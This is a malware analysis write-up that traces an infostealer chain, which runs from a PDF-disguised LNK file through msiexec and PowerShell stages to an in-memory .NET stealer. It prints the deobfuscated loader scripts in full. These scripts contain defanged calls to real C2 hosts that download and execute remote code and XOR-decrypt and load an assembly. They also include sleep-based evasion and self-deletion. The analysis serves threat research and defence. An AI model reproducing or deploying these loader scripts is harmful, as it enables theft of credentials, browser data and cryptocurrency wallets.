I recently came across a site which hosts multiple zip archives masquerading as PDF documents. The aim is to distribute a second-stage PowerShell script which executes a .NET binary in memory. The binary collects system information and targets software such as web browsers, cryptocurrency wallets, two-factor authentication applications and gaming software.

Initial LNK File

The file is delivered to the victim via email, which prompts them to download and open the following file:


A Zip archive is downloaded, which contains a Lnk file, masquerading with a PDF icon.

LNK Target Path (Defanged):

C:\Windows\System32\msiexec.exe -package hxxPs[:/\]onedrive.live[.]com/download?cid=85B4181C5D4F7514&resid=58504D327740F380%21149&authkey=AIHrvoeE31NvUiI&.msi -qn

Upon execution, MsiExec would execute with the argument to download and execute a MSI file from the OneDrive URL provided.

MSI File Analysis

This downloaded a file called “42WiseAnyConnect.msi”, which we can extract a PowerShell script from using lessmsi:


PowerShell Deobfuscation

PowerShell Script:


We can deobfuscate this simply by using an echo command before the command block, which gives us the following:

Set-Location C:\Windows\Temp\WindowsCrashLogs.n5szVex48r7S9FCRb9NECu

$XxXWJGjPwxA = -join[char[]]((950-853),(964-866),(820-721),(1088-988),(769-668),(934-832),(1098-995),(907-803),(444-339),(600-494),(241-134),(877-769),(446-337),(270-160),(468-357),(482-370),(1047-934),(452-338),(731-616),(279-163),(685-568),(934-816),(618-499),(241-121),(1055-934),(1038-916),(742-677),(515-449),(175-108),(856-788),(1017-948),(902-832),(816-745),(438-366),(1013-940),(437-363),(370-295),(479-403),(424-347),(457-379),(262-183),(352-272),(712-631),(775-693),(601-518),(384-300),(953-868),(689-603),(779-692),(950-862),(604-515),(473-383),(1048-999),(478-428),(167-116),(968-916),(421-368),(800-746),(632-577),(532-476),(886-829),(682-634))
$OMDFgkSKhhgc = (1..12 | ForEach-Object { Get-Random -InputObject $XxXWJGjPwxA.ToCharArray() })

$UJgRlaEMS = Get-Random -Minimum 14 -Maximum 92
Start-Sleep -Seconds $UJgRlaEMS
$BHzAyAGYc = -join[char[]]((621-517),(985-869),(451-335),(1024-912),(453-395),(697-650),(948-901),(703-654),(255-202),(714-664),(687-641),(689-633),(194-137),(739-693),(235-186),(566-509),(984-928),(906-860),(695-645),(616-566),(419-364),(909-851),(864-811),(978-930),(401-353),(228-180),(1007-960))
$QPzVfBOYk = $BHzAyAGYc + $OMDFgkSKhhgc
$pXRtrFFiZJzV = Get-Random -Minimum 23 -Maximum 81
Start-Sleep -Seconds $pXRtrFFiZJzV

$zZxOVwAe = Invoke-WebRequest -UseBasicParsing -Uri $QPzVfBOYk
$YFBFxSjCfnC = [System.Text.Encoding]::UTF8.GetString($zZxOVwAe.Content)

Invoke-Expression -Command $YFBFxSjCfnC

Start-Sleep -Seconds 600

Remove-Item -Path $PSCommandPath -Force

We can work out the variables using a similar method, we’ll echo the join[char] string, and convert the output from decimal to ASCII.



[-] $XxXWJGjPwxA = abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890

[-] $BHzAyAGYc = hxxp[://]152.89.198[.]227:5000/

Essentially the script is downloading and executing the content from the IP:Port above, with a random 12-character string URI

The script which lives there is the following:

Set-Location C:\Windows\Temp\WindowsCrashLogs.n5szVex48r7S9FCRb9NECu

$rnd = Get-Random -Minimum 13 -Maximum 91
Start-Sleep -Seconds $rnd

$randomFunctions = @(
    { return [math]::Pi * (Get-Random -Minimum 0 -Maximum 100) },
    { return [guid]::NewGuid().ToString() },
    { return Get-Random -Minimum 0 -Maximum 100 }

$randomFunction = Get-Random -InputObject $randomFunctions`

try {
    $dotNetVersion = (Get-Command 'dotnet').Version.Major
    if ($dotNetVersion -ge 4) {
        Write-Host "Installed Version .NET Runtime: $dotNetVersion"
        Start-Process -FilePath "powershell" -ArgumentList "-Command IEX(Invoke-WebRequest -UseBasicParsing 'hxxps[://]www.fuchs.com[.]sd/media/media/js/ap4.ps1')" -NoNewWindow
    } else {
        Write-Host "$randomValue"
        Start-Process -FilePath "powershell" -ArgumentList "-Command IEX(Invoke-WebRequest -UseBasicParsing 'hxxps[://]www.fuchs.com[.]sd/media/media/js/ap2.ps1')" -NoNewWindow
} catch {
    Write-Host "$randomValue"
    Start-Process -FilePath "powershell" -ArgumentList "-Command IEX(Invoke-WebRequest -UseBasicParsing 'hxxps[://]www.fuchs.com[.]sd/media/media/js/ap2.ps1')" -NoNewWindow

$rnd2 = Get-Random -Minimum 12 -Maximum 73
Start-Sleep -Seconds $rnd2

Remove-Item $PSCommandPath -Force

The main takeaway from this is that the script checks the .NET version of the victim host, the outcome of which decides which script will be executed.

Next stage:

[byte[]] $binary = (Long Byte Arary)

# [Net.ServicePointManager]::SecurityProtocol +='tls12'
$guid = (Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Cryptography).MachineGuid
$config = (new-object net.webclient).downloadstring("hxxp[://]45.129.199[.]204/index.php?id=$guid&subid=ezzcAvVW").Split('|')
$k = $config[0];

for ($i = 0; $i -lt $binary.Length ; ++$i)
	$binary[$i] = $binary[$i] -bxor $k[$i % $k.Length]

$sm = [System.Reflection.Assembly]::Load($binary)
$ep = $sm.EntryPoint

$ep.Invoke($null, (, [string[]] ($config[1], $config[2], $config[3])))

The following actions are performed by the script:

[-] Retrieves the MachineGuid from the Windows registry: $guid = (Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Cryptography).MachineGuid

[-] Retrieves 3 values from ‘hxxp[://]45.129.199[.]204/index.php?id=$guid&subid=ezzcAvVW’ and assigns them to the $config array.

[-] Performs a bitwise XOR operation (-bxor) on the binary array with the first value.

[-] Loads the binary data as a .NET assembly using [System.Reflection.Assembly]::Load($binary).

[-] Accessing the entry point of the loaded assembly: $ep = $sm.EntryPoint.

[-] Invokes the entry point of the assembly with the three values: $ep.Invoke($null, (, [string[]] ($config[1], $config[2], $config[3]))).

The values are as follows:

zpsoJEKDxaCoTLVurobI ezzcAvVW hxxp[://]45.129.199[.]204/index.php

We know that the first value is the XOR key, so we can use this to retrieve the binary from the byte array using CyberChef.


Binary Analysis

The binary can be reviewed in DNSpy as it is a .NET binary, however, it is extremely obfuscated as it has been protected with ConfuserEx.


We can use a Confuser Unpacker to make this code a lot easier to read, I’ll be using this - https://github.com/XenocodeRCE/ConfuserEx-Unpacker/tree/master

Unpack the binary:

C:\Users\mzheader\Desktop\ConfuserEx-Unpacker-master\ConfuserEx Dynamic Unpacker\bin\Debug > & '.\ConfuserEx Dynamic Unpacker.exe' -s C:\Users\mzheader\Desktop\confusing.exe

Instantly, we can see the two arguments being passed from the previous web request

(buildID = ‘ezzcAvVW’ and URL = ‘hxxp[://]45.129.199[.]204/index.php’)


There are some interesting conditions that will prevent execution of the malware:



There are lots of functions typical of info-stealing malware, described below:

Finding and stealing sensitive browser information




Crypto Wallet Paths being defined


Screenshot functionality


Collecting System information


Function detailing how the information is exfiltrated


Full List of interesting function names
